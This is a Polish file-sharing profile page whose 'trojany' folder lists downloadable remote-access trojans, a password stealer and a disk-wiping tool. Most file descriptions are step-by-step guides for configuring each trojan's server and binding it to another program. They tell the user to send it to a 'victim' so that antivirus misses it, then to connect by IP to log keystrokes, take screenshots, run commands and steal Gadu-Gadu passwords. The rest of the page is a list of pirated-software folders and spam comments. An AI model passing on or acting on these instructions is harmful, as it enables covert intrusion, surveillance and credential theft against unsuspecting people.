Wykorzystujemy pliki cookies i podobne technologie w celu usprawnienia korzystania z serwisu Chomikuj.pl oraz wyświetlenia reklam dopasowanych do Twoich potrzeb.

Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, wyrażasz zgodę na ich umieszczanie na Twoim komputerze przez administratora serwisu Chomikuj.pl – Kelo Corporation.

W każdej chwili możesz zmienić swoje ustawienia dotyczące cookies w swojej przeglądarce internetowej. Dowiedz się więcej w naszej Polityce Prywatności - http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Jednocześnie informujemy że zmiana ustawień przeglądarki może spowodować ograniczenie korzystania ze strony Chomikuj.pl.

W przypadku braku twojej zgody na akceptację cookies niestety prosimy o opuszczenie serwisu chomikuj.pl.

Wykorzystanie plików cookies przez Zaufanych Partnerów (dostosowanie reklam do Twoich potrzeb, analiza skuteczności działań marketingowych).

Wyrażam sprzeciw na cookies Zaufanych Partnerów
NIE TAK

Wyrażenie sprzeciwu spowoduje, że wyświetlana Ci reklama nie będzie dopasowana do Twoich preferencji, a będzie to reklama wyświetlona przypadkowo.

Istnieje możliwość zmiany ustawień przeglądarki internetowej w sposób uniemożliwiający przechowywanie plików cookies na urządzeniu końcowym. Można również usunąć pliki cookies, dokonując odpowiednich zmian w ustawieniach przeglądarki internetowej.

Pełną informację na ten temat znajdziesz pod adresem http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Nie masz jeszcze własnego chomika? Załóż konto
marson95
  • Prezent Prezent
  • Ulubiony
    Ulubiony
  • Wiadomość Wiadomość

Mężczyzna Marek

widziany: 25.12.2024 12:57

  • pliki muzyczne
    14
  • pliki wideo
    693
  • obrazy
    33
  • dokumenty
    15

4054 plików
469,26 GB

Ukryj opis
FolderyFoldery
marson95
( The Elder Scrolls V - Skyrim (2011) STEAM + Crack Razor1911
▶AVATAR -- Full-DVD!!!
▶AVATAR --DVD-Rip HQ
►Magiczne drzewo (2009)
ALICJA w Krainie Czarów TS!! (2010)PL
Android 4.0 CM9.0 for Wildfire, wersja stabilna
ANDROID HTC MAGIC
Aplikacje A-D Android
Aplikacje APK
Aplikacje APK(1)
Aplikacje E-N Android
Aplikacje O-S Android
Aplikacje T-Z Android
AVG TuneUp Utilities 2014 14.0.1001.147 [PL] [CRACK]
Bezczel - Prawo ponad prawem (prod. Kaszpir)
Brink
CCNA 2
Colin McRae Dirt 2 Crack
CorelDRAW Graphics Suite X7 PL 64Bit
Counter-Strike 1.6 PATCH v35
Counter-Strike 1.6 PL NON STEAM DOWNLOAD
Dokumenty
DR ALBONISTA
Duck Sauce - Barbra Streisand (Original Mix)
Filmy
Galeria
GrubSon plyta 2011
Grupa Image Testy B 2013
Gry
Gry A-G
Gry Android
gry android(1)
Gry H-P
Gry java
Gry na Android akp
Gry R-Z
GRY(1)
Hemp Gru - Jedność [2011]
Hemp Gru - Remixtape [2011]
Horror
House MD sezon 1
House MD sezon 2
House MD sezon 3
House MD sezon 4
House Music
Krzyk 4
Magic Butt - Interactive ass!
Motywy Do Theme Chooser
Motywy Do Theme Chooser(1)
Muzyka
Najnowsze Gry Android
Nawigacje GPS-offline
NOWA PŁYTA SŁONIA!!! CHORE MELODIE
Och, Karol 2
Pariah
PATOKALIPSA - ZAMKNIJ MORDE JAK RAP GRA BOOTLEG (2012)
Photoshop 7 CE PL
pih
Polski VAG 4.9 - pełna wersja
Prywatne
Przygodowe filmy
ROYAL HACK CSS
Samsung GALAXY s
Sims 3 Update 1.67.2 + Crack (Najnowsza aktualizacja - data wydania 24.01.2014)
Śmieszne kawały,wierszyki
Tears don't fall
TeOeR - Konspiracja [2007]
The Sims 4 - Crack
trojany
Virtual DJ 7 Pro PL (Full + Crack + Skiny)
VNM - Etenszyn Drimz Kamyn Tru [2012]
Wiedźmin 2
Windows 7 PL + aktywator wszystkie wersje Home Basic i inne
zachomikowane
Pokazuj foldery i treści
  • 1 KB
  • 14 lut 12 18:20
Stworzono go dokładnie 9 maja 2001 roku. Autor tego robaka VBS skorzystał z bardzo dużej popularności programu "Big Brother" w Polsce, więc listy generowane przez tego wirusa są następującej treści: Patrycja i Piotr Gulczynski spędzili ostatnia noc w niedwuznaczny sposób. W załączniku wysyłamy zdjęcia będące przedsmakiem tego co pokażemy w najbliższym "Big Brother Extra" Wirus ten jak inne rozprzestrzenia się za pomocą e-maili - pobiera adresy osób znajdujących się w M$ Outlooku i rozsyła do wszystkich swoje kopie. Rozpowszechnia się także za pomocą programu mirc.

zachomikowany

  • 1 KB
  • 14 lut 12 18:20
Virus.Dos.Keeper.Massacre.775 z rodziny wirusów Keeper jest to rezydentny wirus pasożytniczy. Infekuje żądane pliki COM oraz EXE.

zachomikowany

  • 160 KB
  • 14 lut 12 18:20
OTER jest programem usuwającym dane z dysku
Napisany jest w celach czysto edukacyjnych i nie ponoszę odpowiedzialności za to co z nim zrobicie
Działa na 100% wiec uważajcie komu go wysyłacie........

zachomikowany

  • 1,7 MB
  • 14 lut 12 18:20
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "GregStar Trojan 2.2"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik:
"GST 2.2 - Konfigurator.exe"

Zakładka Połączenia:
Numer GG Serwera - zakładamy nowy nr gg ( Wpisujemy go w Numer GG Serwera )
Hasło - Tutaj podajemy hasło które wpisaliśmy zakładając
nowy nr gg (hasło do tego nr powyżej)
Numer GG Klienta - Tutaj podajemy swój nr gg którego używamy na co dzień, Przez ten nr GG będą wysyłane komendy i odbierane informacje
Zakładka Ftp:
Jeśli nie posiadasz konta ftp to załóż je sobie np. na republice (www.republika.pl)
Host - Tu podajemy Host naszego serwera ftp dla republiki to: ftp.republika.pl
Login - tu wpisujemy nasz login do serwera ftp np. Karol
Haslo - tu podajemy hasło do naszego serwera ftp np. Karol
Zakładka Misc:
Nazwa wpisu w rejestrze - Podajemy nazwę pod jaka serwer będzie wpisany w rejestrze
Lokalizacja - Podajemy gdzie ma się serwer zainstalować Np. C:\Windows\Serwer.exe
Komedy:
info - pokazuje informacje o komputerze
dir - przeglądanie folderu np. dir C:\
procesy - Wyświetlanie uruchomionych procesów
kill - zabijanie wybranego procesu np. kill gg.exe
reset - resetuje komputer
poweroff - wyłącza komputer
screen - zrzut ekranu (wymagany FTP)
delfile - kasowanie wybranego pliku np. delfile C:\plik.exe
deltree - kasowanie katalogu np. C:\katalog
message - pokazuje wiadomość o danej treści np.message hello !!!
hideclock - chowa zegar systemowy
showclock - pokazuje zegar systemowy
myszon - przemienia klawisze myszki
myszoff - przywraca poprzedni stan klawiszy
keyloggeron - Aktywuje keyloggera
hdd - wyświetla wszystkie dyski
keylogger - pokazuje zapisane klawisze
keyloggeroff - De aktywuje keyloggera
cmd - wykonanie polecenia systemowego np. cmd ping 127.0.0.1
powiedz - komputer wypowiada wpisane slowa np. powiedz Hello
batch - po wpisaniu tego polecenia wpisuj komendy batch
batchend - zapisuje wpisane komendy batch do pliku .bat
chat - Uaktywnia czat z ofiara po słowie "chat" wpisujemy nick np. chat Zenek
czatoff - De aktywuje czat
deletegst - kasuje na stale serwer GST
open - otwiera dany plik np. open C:\plik.exe
hideopen - otwiera plik w trybie ukrytym
end - zamyka polaczenie GST
ietekst - zmienia tekst naglowka Internet Explorer np ietekst
Internet Oxplorer
iestartowa - zmienia strone startowa Internet Explorera np.
iestartowa http://xlaski.pl
ggcrack - wyciaga hasla z pliku config.dat np. ggcrack
C:\program files\user\Ja1\config.dat
uptime - pokazuje czas uruchomienia systemu
obroc ekran - obraca ekran do "gory nogami"
maxvol - ustawia glosnosc dzwieku na MAX
Komendy FTP:
ftpon - laczy z serwerem FTP
ftpoff - rozlacza z serwerm FTP
ftpadd - laduje plik na serwer FTP np. ftpadd C:\plik na dysku ofiary.exe
ftpget - sciaga plik z serwera FTP np. ftpget plikNaFtp.exe
ftpdel - kasuje plik na serwerze FTP np. ftpdel plik na serwerze ftp.exe
ftplist - pokazuje wszystkie pliki na serwerze FTP
config ftp - zdalna konfiguracja serwera FTP
cfg klient - zmienia numer GG klienta np. cfg klient 123456
cfg load - Laduje konfiguracje z

zachomikowany

  • 2,2 MB
  • 14 lut 12 18:20
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "HackTrack 2.1"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"ASPack.exe", "Konfigurator.exe", "Usówacz.exe", "Wygaszacz.exe"
3. Najpierw odpalamy plik "Konfigurator.exe". Uruchamia się aplikacja widziana na screenie, która służy do odpowiedniej konfiguracji trojana:
obrazek
Uzupełniamy wszystkie ramki odpowiednimi danymi i klikamy na opcję "Zapisz"
4. Teraz wysyłamy plik "Wygaszacz.exe" do naszej ofiary. Plik ten jest serwerem trojana. Ofiara musi go otworzyć.
5. Teraz otwieramy program Gadu-Gadu i wysyłamy którąś z poniższych komend na numer serwera.

Komendy:
Info- Informacje o serverze
screen - wysyła screena(obraz pulpitu ofiary)
open -otwieranie CD
close -zamykanie CD
procesy --uruchomione procesy
voice --uruchamia syntezator mowy na jedno słowo.np. wyslij "voice"
a potem "fuck you"
key - keylogger(wysyła litery które ofiara wpisała na klawiatórze)
kolory - odwraca kolory na ekranie (fajny efekt)
6. Acha. Plik "ASPack.exe" jest to program bindujący. Screen:
obrazek
Służy on do połączenie pliku serwera z dowolnym innym posiadającym rozszerzenie .exe

zachomikowany

  • 2,5 MB
  • 14 lut 12 18:20
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Konik 0.7 Beta"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"Install.exe"
3. Odpalamy plik "Install.exe"rozpocznie się instalacja programu:
obrazek4. Po instalacji wchodzimy do folderu w którym zainstalowaliśmy program i widzimy następujące pliki: "Config.exe", "klient_konik.exe", "server.exe"
5. Najpierw odpalamy plik "Config.exe". Uruchamia się aplikacja widziana na screenie:
obrazek
Służy ona do odpowiedniego skonfigurowania serwera trojana. Gdy już wszystko poprawnie ustawimy klikamy na opcję "Zapisz"
6. Teraz wysyłamy plik "serwer.exe" do naszej ofiary. Ona zaś musi go otworzyć.
7. Następnie otwieramy plik "klient_konik.exe". Uruchamia się aplikacja widziana na screenie, w której podajemy adres IP ofiary i klikamy na opcję "Connect" obrazek

zachomikowany

  • 1,7 MB
  • 14 lut 12 18:20
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "LanSpy 1.0"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"LanSpy.exe", "Server.exe"
3. Plik "Server.exe" podrzucamy swojej ofiarze, która musi ten plik otworzyć ;]
4. My zaś otwieramy plik "LanSpy.exe". Uruchami się aplikacja widziana na screenie, w której podajesz IP ofiary i się łączysz:
obrazek

zachomikowany

  • 1,9 MB
  • 14 lut 12 18:20
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Prosiak 0.70 beta 7"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"client.exe", "konfig.exe"
3. Odpalamy plik "konfig.exe". Uruchomi się aplikacja widziana na screenie:
obrazek
Dzięki niej stworzymy i odpowiednio skonfigurujemy serwer trojana.
Kiedy wszystko poprawnie wpisaliśmy klikamy na opcję "Zapisz"
4. Teraz plik serwer (który utworzyliśmy) wysyłamy do naszej ofiary. Ofiara musi go otworzyć.
5. My zaś otwieramy plik "client.exe". Uruchamia się aplikacja widziana na screenie:
obrazek
Podajemy adres IP naszej ofiary, port i hasło jakie wpisaliśmy w "konfig.exe" do naszego backdoora. No i się łączymy z jej kompem ;]

zachomikowany

  • 1,9 MB
  • 14 lut 12 18:20
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Snape 1.2"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
klient.exe, server.exe
3. Plik o nazwie serwer.exe podrzucamy naszej ofiarze.
4. My zaś otwieramy plik klient.exe, klikamy na zakładkę "Połączenie", w której podajemy adres IP ofiary i klikamy na "Połącz"

obrazekobrazek

zachomikowany

  • 1,8 MB
  • 14 lut 12 18:20
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Luzak 2.00.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
luzak_2.00.exe, server.exe
3. Plik o nazwie server.exe wysyłamy do naszej ofiary.
4. My zaś otwieramy plik o nazwie luzak_2.00.exe. Uruchamia się program widziany na screenie, w ktorym podajemy adres IP naszej ofiary i klikamy na Connect
obrazek

zachomikowany

  • 1,7 MB
  • 14 lut 12 18:20
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "RMF FM 1.1.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
rmf.exe, setup.exe
3. Plik o nazwie setup.exe (czyli serwer) podrzucamy naszej ofiarze.
4. My zaś otwieramy plik o nazwie rmf.exe (czyli client). Uruchomi się program widziany na screenie, w którym musimy podać adres IP naszej ofiary i kliknąć na opcję "connect"
obrazekobrazek

zachomikowany

  • 5,3 MB
  • 14 lut 12 18:20
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Ramirez 2.0.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy foldery:
"klient", "serwer"
3. Wchodzimy do folderu "Serwer" i wysyłamy do naszej ofiary plik znajdujący się w tym folderze. Jest to plik o nazwie "scanlog.exe". Potem ofiara musi ten plik odpalić, a jej antywir nic nie zczaić.
4. My zaś wchodzimy do folderu o nazwie "klient" i odpalamy plik o nazwie "Klient.exe". Uruchamia się program widziany na screenie w którym musimy podać adres IP i kliknąć na opcję "Connect".
obrazek

zachomikowany

  • 1,6 MB
  • 14 lut 12 18:20
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Matrix 1.03.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"The_Matrix.exe", "server.exe", "server2 (bez konfiga).exe"
3. Plik "server.exe" lub "server2 (bez konfiga).exe" musimy podesłać naszej ofiarze, Ofiara musi go otworzyć a jej antywir nic nie zczaić.
4. Następnie otwiearmy u siebie plik klient o nazwie "The_Matrix.exe".Uruchamia się program widziany na screenie w którym podajemy adres IP naszej ofiary i klikamy na opcję Connect ;]
obrazek

zachomikowany

  • 1,6 MB
  • 14 lut 12 18:20
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Matrix 1.03.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"The_Matrix.exe", "server.exe", "server2 (bez konfiga).exe"
3. Plik "server.exe" lub "server2 (bez konfiga).exe" musimy podesłać naszej ofiarze, Ofiara musi go otworzyć a jej antywir nic nie zczaić.
4. Następnie otwiearmy u siebie plik klient o nazwie "The_Matrix.exe".Uruchamia się program widziany na screenie w którym podajemy adres IP naszej ofiary i klikamy na opcję Connect ;]
obrazek

zachomikowany

  • 1,6 MB
  • 14 lut 12 18:20
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Skun 0.11.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"client_011.exe", "server_011.exe".
3. Plik "server_011.exe" musimy podesłać naszej ofiarze. Ofiara musi otworzyć ten plik a jej antywir nic nie zczaić.
4. Następnie otwiearmy u siebie plik klient o nazwie "client_011.exe".Uruchamia się program widziany na screenie w którym podajemy adres IP naszej ofiary i swoje a potem klikamy na magiczną opcję Connect ;]
obrazek

zachomikowany

  • 2,2 MB
  • 14 lut 12 18:20
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Strike Backdoor 0.96.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"strike.exe", "server.exe".
3. Plik "server.exe" musimy podesłać do naszej ofiary. Ofiara musi go otworzyć a jej antywir nic nie zaczaić.
4. Następnie otwiearmy u siebie plik klient o nazwie "strike.exe". Uruchamia się program widziany na screenie:
obrazek
Klikamy na opcję "Połącz z komputerem zdalnym (serwerem)". Wyskakuje nam okienko w którym musimy podać HOST ofiary (który ustalamy np. na podstawie jej IP) i klikamy na opcję połącz.

zachomikowany

  • 1,8 MB
  • 14 lut 12 18:20
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "NetBus.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"NetBus.exe", "Patch.exe".
3. Plik "Patch.exe", czyli serwer trojana musimy podesłać do naszej ofiary. Ofiara musi go otworzyć a jej antywir nic nie zaczaić.
4. My zaś otwieramy plik "NetBus.exe". Uruchamia się program widziany na screenie w którym podajemy adres IP naszej ofiary i klikamy na Connect.
obrazek

zachomikowany

  • 2,7 MB
  • 14 lut 12 18:20
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Nishica 1.0.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"Nishica.exe", "win98.exe", "winXp.exe", "ResHacker.exe"
3. Plik "win98.exe" lub "winXp.exe" (w zależności od wersji systemu jakiego używa nasza ofiara), musimy podesłać do naszej ofiary. Ofiara musi go otworzyć a jej antywir nic nie zaczaić.
4. My zaś otwieramy plik "Nishica.exe". Uruchamia się program widziany na screenie w którym podajemy adres IP naszej ofiary i klikamy na opcję Połącz.
obrazek5. Acha plik"ResHacker.exe" może posłużyć np. do zmiany ikon.

zachomikowany

  • 1,7 MB
  • 14 lut 12 18:20
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Mass Conect 2.0 beta.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki:
"mc2.exe"
3. Odpalamy plik o nazwie "mc2.exe". Uruchamia się program widziany na screenie:
obrazek4. Najpierw klikamy na zakładkę "Ustawienia Klienta". Uruchomi się okienko widziane poniżej. Musimy je uzupełnić odpowiednimi danymi i kliknąć na opcję "Zapisz"
obrazek5. Następnie musisz kliknąć na zakładkę "Ustawienia serwera". Uruchamia się program widziany na screenie, który należy uzupełnić odpowiednimi danymi i kliknąć na opcję "Zapisz". Dzięki temu powstanie plik serwer.
obrazek6. Plik serwer który przed chwilą utworzyłeś należy wysłać do swojej ofiary. Ofiara musi go otworzyć a jej antywir nic nie zczaić.
7. Na koniec otwierasz plik "mc2.exe" i wysyłasz odpowiednią komendę na serwer trojana.
PS: Więcej informacji o obsłudze trojana znajdziesz w pliku "Info.txt" w paczce.

zachomikowany

  • 2,2 MB
  • 14 lut 12 18:20
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "l4n-tr0j4n v1.0.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy następujące foldery:
"FSG", "Klient", "Serwer", "Stub"
3. Najpierw wchodzimy do folderu "Serwer" i plik o nazwie "svchost.exe" wysyłamy do naszej ofiary. Ofiara musi ten plik otworzyć a jej antywir nic nie zczaić.
4. Następnie wchodzisz do folderu "Klient" i odpalasz plik o nazwie
"l4n-tr0j4n v1.0.exe". Uruchamia się program widziany na screenie w którym podajesz adres IP swojej ofiary i klikasz na Połącz.
obrazek5. Acha. Plik FSG który znajduje się w folderze FSG to binder.

zachomikowany

  • 0,6 MB
  • 14 lut 12 18:20
Program złodziej GG służy do wykradania plików config.dat i archives.dat.

Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "Zlodziej GG v1.1.zip"
2. Dekompresujemy ten plik i wchodzimy do folderu. Teraz odpalamy plik o nazwie: "Złodziej GG v1.1". Uruchamia się program widziany na screenie:
obrazek3. Uzupełniasz wszystkie ramki i klikasz na opcję "Generuj"
Teraz wysyłamy plik "sgg.exe" (możemy zmienić nazwę pliku) do osoby którą chcemy "okraść".

4. PRZYKŁADOWA KONFIGURACJA NA SKRZYNCE WP.PL:
-Email:
jankowalski@wp.pl
-Login:
jankowalski
-Hasło:
********
-Smtp:
smtp.wp.pl
-Port:
25

5. PRZYKŁADOWA KONFIGURACJA NA SKRZYNCE POCZTA.FM:
-Email:
jankowalski@poczta.fm
-Login:
jankowalski
-Hasło:
********
-Smtp:
www.poczta.fm
-Port:
25

zachomikowany

  • 476 KB
  • 14 lut 12 18:20
GG Remote Password Cracker v 1.0. Program służy do łamania haseł gg na własnym oraz zdalnym komputerze. Program potrafi wykraść listę kontaktów + hasło do profilu :]
1. Ściągamy skompresowany plik o nazwie "GG RPC.zip". Następnie go rozpakowujemy i odpalamy plik o nazwie "GG RPC.exe"
2. W pierwszej zakładce o nazwie "ŁAMACZ HASEŁ"
możemy złamać hasła znajdujące się na twoim komputerze wystarczy kliknąć przycisk i czekać aż program sam wyszuka i wydobędzie hasła z wszystkich plików config.dat. Screen:
obrazek3. Teraz przechodzimy do zakładki "Nr Gadu". Screen:
obrazek
Będzie nam potrzebny dodatkowy numer gg, dlatego musimy założyć nowy numer.
W pierwsze pole o nazwie "NR GG SERVERA" wpisujemy drugi stworzony numer
natomiast w drugie pole o nazwie "HASŁO GG SERVERA" wpisujemy hasło do tego nowo stworzonego numeru. Zaś w trzecie pole wpisujemy swój prawdziwy numer gg i klikamy na opcję "Generuj". Powstaje skonfigurowany trojan o nazwie server.exe, którego nazwę i ikonę możemy zmienić. Nie wolno tylko zmieniać jego rozszerzenia, czyli musi pozostać rozszerzenie .exe. Ten plik który wygenerowaliśmy wysyłamy oczywiście do swojej ofiary. Wystarczy że ofiara otworzy plik i automatycznie zostaną przesłane hasła na nasze gg.

zachomikowany

  • Pobierz folder
  • Aby móc przechomikować folder musisz być zalogowanyZachomikuj folder
  • dokumenty
    0
  • obrazy
    0
  • pliki wideo
    0
  • pliki muzyczne
    0

22 plików
36,85 MB




takisobie1234 napisano 10.07.2012 13:40

zgłoś do usunięcia

obrazek

JUŻ U MNIE EPOKA LODOWCOWA 4 Wędrówki Kontynentów z Dabbingiem PL,prócz tego znajdziesz u mnie bogatą kolekcję seriali ,filmów ,programów ,gier oraz różnych symulatorów. Codziennie GB nowych plików. Staram się utrzymywać chomika w porządku by każdy mógł znaleźć to czego szuka

GryLogiczne.PL

GryLogiczne.PL napisano 24.07.2012 23:28

zgłoś do usunięcia

Witamy Ciebie serdecznie chomikomaniaku. Kliknij proszę na poniższy rysunek, a

obrazek

zobaczysz niewiarygodnie wielki zbiór ciekawych gier. U nas jest brak haseł. Nie ma limitu na ściąganie - pobierasz ile pragniesz. Zapunktujesz! Pozdrawia zespół w składzie: Mirek, Karol oraz Janek.

ksspr

ksspr napisano 14.08.2012 10:44

zgłoś do usunięcia
muhahahaha zapraszam
BorucGT

BorucGT napisano 9.10.2012 09:50

zgłoś do usunięcia
Zapraszam do mnie muzyka i wiele więcej
Dead-Zone

Dead-Zone napisano 2.12.2012 11:31

zgłoś do usunięcia
Zapraszam
magdalenka95

magdalenka95 napisano 7.03.2014 15:49

zgłoś do usunięcia
obrazek
higawe8050

higawe8050 napisano 18.04.2022 11:36

zgłoś do usunięcia
Super chomik
gocab64626

gocab64626 napisano 28.11.2022 08:52

zgłoś do usunięcia
Super chomik
LeonxD4890

LeonxD4890 napisano 6.01.2025 14:59

zgłoś do usunięcia
Zapraszam

Musisz się zalogować by móc dodawać nowe wiadomości do tego Chomika.

Zaprzyjaźnione i polecane chomiki (8)Zaprzyjaźnione i polecane chomiki (8)
Zgłoś jeśli naruszono regulamin
W ramach Chomikuj.pl stosujemy pliki cookies by umożliwić Ci wygodne korzystanie z serwisu. Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, będą one umieszczane na Twoim komputerze. W każdej chwili możesz zmienić swoje ustawienia. Dowiedz się więcej w naszej Polityce Prywatności